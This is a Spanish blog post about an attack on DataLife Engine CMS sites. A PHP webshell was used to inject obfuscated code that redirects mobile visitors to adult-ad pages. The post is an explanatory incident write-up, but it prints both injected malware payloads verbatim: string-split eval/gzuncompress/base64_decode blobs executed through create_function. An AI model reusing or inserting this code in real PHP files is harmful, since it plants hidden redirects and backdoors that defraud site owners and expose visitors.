Ataques a sitios web con fraude publicitario en Datalife Engine


Por administrador En: Noticias, DataLife Engine, Modulo DLE, WebSite, webmasters, Estafa, Tutorial 0

Ataques a sitios web con fraude publicitario en Datalife Engine
Recientemente el CMS de Datalife Engine fue atacado por algún desocupado el cual creo una puerta trasera o phpshell (Backdoor:PHP/WebShell) en unos de sus directorios. Una vez que tuvo acceso con esta puerta trasera pudo infectar algunos de los archivos de php en el CMS de datalife engine, con un código ofuscado del php. Leer mas sobre este tema...
Hay varios métodos para estas ediciones, pueden ser vulnerabilidades de ejecución de código remoto (todo POST o GET que se use en el código debe ser primero santizado) o de inclusión de ficheros, pudiendo subir una phpshell (es como un administrador de ficheros) que le permitiría editar los ficheros deseados y añadir este tipo de código donde lo requiera, tras esto normalmente eliminan la phpshell para no dejar rastro.
Ahora le toco a otro dominio mundopoetico.es, con el mismo principio inyecto el siguiente código en /engine/classes/mysql.php
$liciens = "@Ev"."aL(gZu"."ncOmp"."rEss(bAs"."e64"."_Dec"."odE('eF6dVG1P2zAQ/itFqnAiWFoorEAVjYGqDW0aGy+bpg1FTnxNvCZ2ZjsUtOO/75wwdaCqk/YhPvven7vL9W0ly5glrBexpPGnBdM+pD9FwiZyFkhrwQX95PT8/N3Z9FvfG92E4a9jYmdazyUELW/7mcrWzraTFQTh1sH+4f54mw1YOHkgh8HxM804Zoe7e+PhaHzAQm3WyA/Xyw+G/5DvsFWJs+FouDfeP9wbj9gy54Pxfpdz38xicnk5vfg8vfhmnTFwGxBxuqlrMAEzYGAGJqmdKyjAzaTfGPmXCbuYfrqeXl4l1xdnjKSkvd6hNE3iLDQ/qR3e33G/0DZeZ+GsLpbxC+CCuI96bPRK5llUV853dWBl4Qb+Ns+gyFpWlkWe5kZ78mK0aLmDI1u3Jq7oHSndzoTjrYV+z0IimxZ0OzAEiIjhi8aUoDItqLRm1qrU3PAKHJj4e38O9wttBJnRw8JmY+IdsluBJ/67ppsE6pl3VjhXHw08Dl8bOkk9DCdwJ93k4X86ZvP1Jk5BzhMDtlla+WHeWLb57dXVx+SaXsnrN9MPV+zGD+MaMc1lO68btYE8qbjLioANUi5FgxlhRV5ojTKvOJ5oh7WkpiKv0hLwKz8xeoFUE3p8GZ0mOC0dP1P4JQeHXAm4Q8kTbrICtc5JKSUPFZdlNJBs28MN6VcgAE9it4ZRp2dQKut4TnEVtQ+7vBrXpEBnlN53mWmh9BybUuc44xmkOkI9j0yDt/Mo013wCEWTzf2HVue6QVuAIlvFbz0iXUZZh8vgQjofzEKb+r2vAOVjFWnQv7qLJs0iTKXKOxw0ZC2KpzDqKKXq0DJDnUrC/mO3AryvUskVWqLaohJGS4GVFDWCkWC/914OsXBZQjwlsS60gmWpqDDBxrNNyEQJSUNREimo1yt1/mzLVvYkx5gLoWBhkSonVVQXNXJRPd5o/HNpfSHiGYBIOVUuLn3pXKdFQsOd1KpL0cguhL/1NuKe31urFt3jGh2zVav54eE3UbcLlg==')));";$release_this = "cre"."ate_"."function";if (@function_exists($release_this)){@$dle_func = $release_this('', "$liciens;");$dle_func('');}      
Y en estos /engine/data/dbconfig.php, /engine/inc/options.php:
$dle'.'_lic = "@Ev'.'"."AL(gZu'.'"."nC'.'Omp"."rEss(bA'.'S"."e'.'64"."_D'.'ec"."odE('eF6dVG1v2zgM/ispEFQ21jlp0y5tA2O9DcGuuMO668uGYSsM2WZsXWzRJ8nNirH//Si7Q9qty4B9sGhJD18ekuLQ1qpSFmORiEEkktavFky3UX7NExQztQiUteCCYfL67Oyv0/mn4b3idRh+PeGbDHGpIPh2vPMj8NnujlM1BOGzw4Ojg+mOGIlwdseWg5MfwXEsjvb2p+PJ9EiEaDZCDse/huz+GrInfkJFjCfj/enB0f50ItYUDqcHPYWhWcRs+GJ+/n5+/sk6Y+AmYOGwbRowgTBgYAEmaZwr2cf1bNga9UBFnM//uZpfXCZX56eCbxm92aAybeIstP9xnby9k2GJNt6k4SyWa/8lyJxP73Fi8lIVWdTUzpd7ZFXpRv5vmUGZdUdZFnlZGPTi+WTVnY6ObdOpuHJwrLFrFic7DfxbhCy2LWDXSUyIhZGr1lSgM8w5u2bRQRppZA0OTPx5uITbFZqc1XhjYbs18S7rPcEnfpjTbSb1nXVROtccjzwPnxteGR6GM/ii3Ozudypmi80qTkMhEwO2XWv53t5al/nPy8t3yRXvkj/ezN9eimvfkhuuuTW7rt1qDBRJLV1WBmKUSpW3lDFXkiUiqaKW9AodNYqLSrJOK6CP8pXBFXFOePNh8jqheeXkqaYPBTiSOocvpGQiTVYSYsGglC3UUlXRSIkdTzfk18AEHvnuFKMeZ0hp62TBfjWXj/q4WtemwGuU3vaRYa5xSW2FBS1kBilGhMvItHSzjDLsnUeUt9nSf2SxwJZsCZp1tbzxjLCKsp6XoZVy3pmFLvRbnwGOx2pG8HPdI5NmEaVKFz0PbrKOxWMaTZRydnjKEaaKuf+7VwPd1qmSmixLtKRzgyqnWuUNgVFgPw9ejKl0WcJnWlFTooZ1qjgxwdZ3E1LkFSQte0lUzrV+EvNginbXj8KMZZ5rWFni5CkdNWVDMq/v//gFFMr6XMQLgDyVnLy48tlzPYovjXQKdR+lUb0L/zfYigd+dP1k3N0P3ql4al7f3f0P9ywaOQ==')));";$lic_'.'true = "cre'.'"."ate_"."func'.'tion";if(@func'.'tion_exi'.'sts($lic_'.'true)){@$dle'.'_conf = $lic'.'_tr'.'ue('', "$dle_lic;");$dle_'.'conf('');}                                                                           
Decodificando el código vemos que usaba el user_agent del acceso y si era un dispositivo móvil le asignaba una cookie y redireccionaba hacía una lanzadera externa, en cambio si la visita venía desde el buscador, equipo de sobremesa o similar, no realizaba ninguna acción:


Ataques a sitios web con fraude publicitario en Datalife Engine
Después de limpiar el código ofuscado y de eliminar la puerta trasera el sitio web se muestra con normalidad y sin publicidad para adultos.

Acontinuacion les dejare una captura de pantalla de esa mierda de publicidad (A saber que esta era la que mas salía pero son muchas en si ).

Ataques a sitios web con fraude publicitario en Datalife Engine
Y en conclusión hay que tener mas cuidado con las actualizaciones de seguridad del CMS (sistema de gestión de contenido), módulos, complementos y demás. 

Recomendamos leerVirus en el sistema DataLife Engine (DLE) y cómo tratarlos...
Compartir
Síguenos en Síguenos en Google News
¿Te gusto la informacion?

Si te gustó la publicación, apóyanos compartiendo en tus redes sociales o dejanos tu comentario.

administrador

Sobre mi: Mi nombre es Alexander fundador y CEO, y me gusta llamarme un Geek. Amo la informática, tecnología y todo lo que está relacionado con ella. Inicié este sitio con la intención de compartir conocimientos como cursos en línea, tutoriales y videotutoriales. Estoy muy entusiasmado con la información que he descubierto y compartido hasta el momento. La verdad es que lo he hecho con el mayor de los gustos. Así es, soy un Geek con una visión para compartir conocimiento..Leer mas...
Tutoriales en línea

Post Relacionados


Comentarios



Información
Usuarios que no esten registrados no pueden dejar comentarios, te invitamos a que te registre!